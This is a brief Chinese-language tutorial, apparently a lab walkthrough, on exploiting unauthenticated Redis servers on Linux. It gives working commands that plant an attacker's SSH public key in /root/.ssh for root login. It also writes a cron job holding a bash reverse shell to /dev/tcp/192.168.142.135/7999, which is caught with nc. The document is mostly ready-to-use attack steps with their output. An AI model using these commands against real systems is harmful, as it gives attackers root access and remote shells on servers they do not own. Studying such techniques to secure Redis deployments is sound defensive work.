redis未授权访问漏洞linux版本利用

一、利用公私钥实现root登录
1、在攻击机中生成ssh公钥和私钥，密码设置为空：
ssh-keygen -t rsa

生成公私钥.png

2、将公钥拿出来备用
cat id_rsa.pub

查看公钥.png

3、把公钥写入目标机器的 /root/.ssh

192.168.142.133:6379>  config set dir /root/.ssh/
192.168.142.133:6379>  set x "\n\n\n ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCiRaD+G2fVhJdLQ5SYb/HZNQ6whHpFgAkTdocpQIAOyRFf9PXbaO+l1dlPk8mrrjR15VF7N3gkDofPFN4t9Tq18ckVCiP04UiyDuYQgj9ZVGY1TqV8kT3b1u6iBA2HFdNzf/1ch35LAe12mmutXnCV4orQeSy3cToPKUceUUe7G1olxsTd3eTavaLnJGkW+vmoQQg0qy4SL+CcwifpxxAjlRIAtiqEriZ/T+lZ3NNT88U2F9VfWjApGuIlpA9HdToG7QcuTZn6pfLxJ5Xn5hqjf++XnGw1xbt/yYbvk4IQOxw9SjnegTeEoc8SHUCPsQf+ZKE3VQZywAIBsh/COzt8AmlgId8d6OgkU7gX2azcNU3KD+1W5nIXg21fhSgAwaMc3plEj9s4cvhJm9eYGFkDqPbehAsg9LE3/LzkHUxvsTiXWFyW4XYUu5Xr0NVdp0Wq4rwhFYvh8QKD+jJuT657t4s0ZZbTZdnqrFW989/DUReuty1h0ahknloxOzPp7+0= root@kali\n\n\n"
OK
192.168.142.133:6379> save
OK
192.168.142.133:6379>

4、在攻击机中连接

连接目标靶机.png

攻击成功
二、利用定时任务来执行shell
1、在定时任务中写入shell

192.168.63.130:6379> set x "\n* * * * * bash -i >& /dev/tcp/192.168.142.135/7999 0>&1\n"
OK
192.168.63.130:6379> config set dir /var/spool/cron/
OK
192.168.63.130:6379> config set dbfilename root
OK
192.168.63.130:6379> save
OK

2、使用nc接收监听

nc获取shell.png

因为是定时任务，不能及时反弹，需要稍微等一下，等待时间是你定时任务设定的时间